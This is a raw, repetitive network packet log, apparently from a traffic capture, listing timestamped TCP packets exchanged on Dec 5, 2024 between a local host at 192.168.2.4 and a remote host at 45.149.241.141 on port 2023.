                                                                                                                  Dec 5, 2024 10:46:38.476999044 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.478022099 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.478117943 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.478164911 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.479196072 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.479216099 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.479264975 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.480305910 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.480427980 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.480479002 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.481476068 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.481503963 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.481617928 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.482561111 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.482666969 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.482716084 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.483726978 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.483831882 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.483874083 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.484859943 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.484971046 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.485018015 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.486083031 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.486119986 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.486171007 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.487363100 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.487488985 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.487535000 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.488822937 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.489082098 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.489131927 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.490184069 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.490309000 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.490355968 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.491466999 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.491564989 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.491638899 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.492594957 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.492621899 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.493303061 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.493987083 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.494148970 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.494199038 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.495570898 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.495695114 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.495743036 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.496764898 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.496896029 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.496942997 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.497870922 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.498002052 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.498044968 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.498637915 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.498673916 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.499262094 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.499567032 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.499639988 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.499686003 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.500550032 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.500643015 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.500693083 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.501405954 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.501494884 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.501542091 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.502410889 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.502526999 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.502573013 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.503544092 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.503650904 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.503695011 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.504712105 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.504725933 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.504766941 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.505747080 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.505805016 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.505861044 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.506597042 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.506737947 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.506783009 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.507905960 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.508004904 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.508048058 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.509192944 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.509294987 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.509356976 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.510504961 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.510530949 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.510588884 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.511828899 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.511857033 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.511908054 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.512794971 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.512916088 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.512963057 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.513830900 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.514096975 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.514141083 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.515129089 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.515192986 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.515240908 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.515862942 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.515947104 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.515989065 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.536374092 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.536446095 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.536457062 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.536514997 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.536569118 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.536580086 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.536612034 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.586464882 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.680326939 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.680524111 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.680586100 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.680737972 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.681045055 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.681092978 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.681987047 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.682085037 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.682133913 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.683178902 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.683280945 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.683336973 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.684276104 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.684364080 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.684413910 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.685703039 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.685741901 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.685777903 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.686947107 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.687158108 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.687201977 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.688308001 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.688371897 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.688410997 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.689429045 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.689521074 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.689616919 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.690478086 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.690665960 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.690710068 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.691812038 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.691987991 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.692029953 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.693038940 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.693145037 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.693192005 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.694051027 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.694143057 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.694194078 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.695077896 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.695102930 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.695139885 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.696176052 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.696191072 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.696233988 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.697324038 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.697424889 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.697464943 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.698580027 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.698728085 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.698770046 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.699384928 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.699568033 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.699615955 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.700844049 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.700913906 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.700958967 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.701906919 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.701992989 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.702035904 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.703022003 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.703183889 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.703228951 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.704328060 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.704447031 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.704482079 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.705451965 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.705544949 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.705591917 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.706674099 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.706773043 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.706814051 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.707885981 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.708046913 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.708089113 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.709484100 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.709537029 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.709582090 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.710520983 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.710577965 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.710618019 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.711611032 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.711899996 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.711946964 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.712801933 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.712862968 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.712904930 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.713752031 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.713778973 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.713816881 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.714956045 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.715024948 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.715068102 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.716068029 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.716154099 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.716198921 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.717065096 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.717137098 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.717179060 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.717973948 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.718070030 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.718113899 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.718997955 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.719050884 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.719090939 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.720000982 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.720172882 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.720217943 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.721290112 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.721317053 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.721360922 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.722476006 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.722573996 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.722619057 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.723470926 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.723525047 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.723570108 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.724601030 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.724658012 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.724700928 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.725609064 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.725687981 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.725728989 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.726665974 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.726735115 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.726769924 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.727684975 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.727766037 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.727803946 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.728737116 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.728849888 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.728894949 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.729784966 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.730005026 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.730046034 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.730930090 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.731038094 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.731086969 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.732064009 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.732191086 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.732232094 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.733230114 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.733294964 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.733339071 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.734354019 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.734441042 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.734487057 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.735512972 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.735599995 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.735645056 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.736599922 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.736834049 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.736865997 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.737814903 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.737915039 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.737984896 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.739022970 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.739105940 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.739165068 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.740343094 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.789583921 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.872328997 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.872400045 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.872478008 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.872781992 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.872865915 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.872909069 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.873990059 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.874064922 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.874114037 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.875103951 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.875186920 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.875233889 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.876209974 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.876333952 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.876377106 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.877362967 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.877520084 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.877566099 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.878635883 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.878750086 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.878793955 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.879898071 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.879972935 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.880018950 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.880850077 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.880930901 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.880975008 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.881930113 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.882000923 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.882045031 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.883100986 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.883177042 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.883224964 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.884227037 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.884339094 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.884387970 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.885404110 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.885524988 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.885577917 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.886508942 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.886601925 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.886651993 CET497382023192.168.2.445.149.241.141
